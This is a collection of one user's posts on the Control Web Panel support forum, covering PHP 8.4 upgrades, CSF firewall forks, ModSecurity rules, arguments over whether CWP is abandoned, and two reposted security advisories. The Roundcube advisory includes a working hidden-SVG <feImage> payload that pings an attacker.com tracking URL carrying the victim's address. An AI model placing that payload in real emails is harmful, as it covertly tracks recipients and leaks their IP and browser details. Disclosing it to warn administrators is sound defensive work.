Messages

1

PHP Selector / Re: Support for PHP 8.4

« on: February 18, 2026, 07:18:00 PM »

Your be better posting it here https://www.alphagnu.com as cwp spends more time down than up.

True. The forums here where down for 3 days, again.

sysadmin.help is live now also.
And SSL works

2

DNS / Re: Problem connecting to CWP server on Cloudflare

« on: February 18, 2026, 07:15:52 PM »

CWP doesn't talk to Cloudflare.

So any changes on your CWP server won't affect Cloudflare, and vs versa.

3

Other / Re: Goodbye CWP — I’m done for good

« on: February 18, 2026, 07:10:18 PM »

Completely agree with Jaspreet Singh.

This project seems to be dead, as we have not received any updates since Nov 2024, and there is no support on the forum either.

Some time ago, I contacted the CWP team, and they said they were working, but they blocked me then. There are a few members who are running the forum by just saying "CWP Team is working, CWP is not dead, blah blah, etc.." and a few of them are sharing their article users, but the actual CWP team doesn't bother looking at the forum.

It's time to move on

Project is NOT DEAD. Not sure why you keep posting that line...

CWP pushed an update today (2026-02-18)  0.9.8.1222.
And before that 0.9.8.1221 was pushed on 2026-02-02

It's personal preference if you want to stop using CWP and 'move on'

I've tested other panels, and they all have CVEs and can not be kept updated as easily as CWP can be.
Some don't even have the features CWP has, and cost $$$ more.

Can CWP do better with some things, yes.

4

Other / Re: CWP Forums constantly down

« on: February 12, 2026, 11:03:27 AM »

Yes, I have already reported the problem to José, it is due to an old and no longer updated version of SMF. I suggested to José that he switch to PHPBB, which is much more robust and much better in this regard.

phpBB is good, but SMF 2.1.6 seemed better IMO, but I got out voted for another project. :/

sysadmin.help is finally live.
Feel free to post here & there.

5

PHP Selector / Re: Support for PHP 8.4

« on: February 12, 2026, 11:00:29 AM »

The guide at:
https://www.alphagnu.com/topic/615-install-latest-version-of-php-84-php-switcher-in-cwp-control-web-panel-el89-almalinux-89/

Is for both AlmaLinux 8 and 9.
If you are running either of those you should not have to 'tweat' any paths.

Some modules where retired when PHP 8.4 was released, like IMAP in 8.4, that now need to be loaded via PECL.

6

Mod_Security / Re: Updated Comodo WAF Rules (2025/2026) for CWP & WordPress - Community Feedback

« on: February 11, 2026, 08:40:41 PM »

The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.

7

Updates / Re: Roundcube vulnerability

« on: February 11, 2026, 02:01:52 PM »

Have an updated guide for 1.5.13:

https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/update-roundcube-webmail-to-version-1-5-13-in-cwp-on-almalinux-8-9/

8

E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens

« on: February 09, 2026, 06:24:31 PM »

Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code: [Select]

text<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>
It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field   Value
CVE   CVE-2026-25916
Vendor   Roundcube
Product   Roundcube Webmail
Affected Versions   <1.5.13, <1.6.13
Disclosure Date   2026-02-08
Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage\|image\|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.

9

CentOS 9 Problems / New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root

« on: February 09, 2026, 03:36:30 PM »

For those running CentOS Stream 9, this is a Major Vulnerability.


New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author image    Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/


A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.

The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.

The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.

Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.

Code: [Select]

cstatic s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
            struct sk_buff **to_free)
{
    // ...
    if (q->buffer_used > q->buffer_limit) {                 // [1] Check buffer limit
        u32 dropped = 0;
        while (q->buffer_used > q->buffer_limit) {
            dropped++;
            cake_drop(sch, to_free);                        // [2] Packet is DROPPED here
        }
        b->drop_overlimit += dropped;
    }
    return NET_XMIT_SUCCESS;                                // [!] Returns SUCCESS anyway
}        

Root Cause in CAKE Scheduler

The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.

The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.

Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.

10

CSF Firewall / Re: Should we update CSF to V15??

« on: February 06, 2026, 02:19:35 PM »

They are 2 sperate CSF forks.

Hence all the forks have different version numbers now, not a universal one.

Some could use the last CSF v15.00 code, call it CSF2 with v1.0

If you want to switch to the Sentinel  fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.

But it's all personal preference at this time.

11

CentOS 9 Problems / Re: ClamAV issue in user panel

« on: February 05, 2026, 12:23:49 PM »

With AlmaLinux 9, things have to be installed in a certain way.
Including ClamAV.

If not, they will not work.

There is an old install guide running around the forums on the proper way to install AlmaLinux 9 and CWP.

12

Mod_Security / Re: atomic crop. free waf rules set

« on: January 31, 2026, 06:49:36 PM »

By all means have fun using AI...

When your server is hacked, maybe you can ask it for help also...

But don't blame CWP or anything else when it happens...

13

Mod_Security / Re: atomic crop. free waf rules set

« on: January 31, 2026, 06:13:07 PM »

Ah, I'm not a Sys Admin and don't know what I'm doing, so let me use ChatGPT... 

Thanks for the laughs...

And the basic security holes that ALL hackers use, that AI just opened your server to...

Using that guide, you might as well just uninstall ModSecurity...

14

Updates / Re: Is CWP dead? Looking for alternatives

« on: January 13, 2026, 01:49:48 PM »

I agree, the forums being down for hours and sometime days is very annoying.
CWP claims it's due to Layer 7 DDoS attacks.

Where is the source of this information?
There is multiple affirmations like this made from you, but no source to confirm this.

And i doubt that is that answer, since the issue is clearly because of misconfigured server where the forum is - many times there is Nginx errors. And just look in how outdated and with MANY errors this installation of SMF have - you cannot even enter a user profile.

CWP isn't without flaws, but compared to other panels, CWP can be updated/customized better than others on the market I've tested.
That is what's nice about CWP, you can update certain components without breaking the control panel, just like you can with Webmin/Virtualmin.

Can you provide any example of what are you talking?
"customized" like what?

Not sure about anyone else, but I've offered to help, but have been turned down.

Your "help" was "But by all means move to cPanel...". I am quoting YOU.
Of course your help is turned down - not because you are the victim, but because you didn't provide any help really.

1. The source of that information is directly from CWP via a support ticket I submitted.
You can doubt whatever you want, but that is the answer I received form them.

Only real problem with the forums is an expired SSL.

2. There are many aspects from HTTP, PHP, ModSecurity, etc., but since you don't know, that shows you probably don't use CWP.

3. Yup. You are just a BS poster, @overseer and myself provide a majority of help here.
And I was talking about offering help to CWP also.

All you seem to be doing is posting hate without knowing how CWP really works via GUI and CLI.

15

Updates / Re: Is CWP dead? Looking for alternatives

« on: January 13, 2026, 12:38:04 PM »

CWP isn't without flaws, but compared to other panels, CWP can be updated/customized better than others on the market I've tested.
That is what's nice about CWP, you can update certain components without breaking the control panel, just like you can with Webmin/Virtualmin.

Just look at my PHP thread on updates.

I agree, the forums being down for hours and sometime days is very annoying.
CWP claims it's due to Layer 7 DDoS attacks.

But since you hate CWP so much, and like Ubuntu/Debian you can use your CloudPanel, and leave CWP...
Or use HestiaCP.
If you switch to either I would recommend using Debian for production use.
As using Ubuntu would be like using Fedora.

Neither uses ELx, and doesn't have some of the features of CWP.

It's as simple as that...

Not sure about anyone else, but I've offered to help, but have been turned down.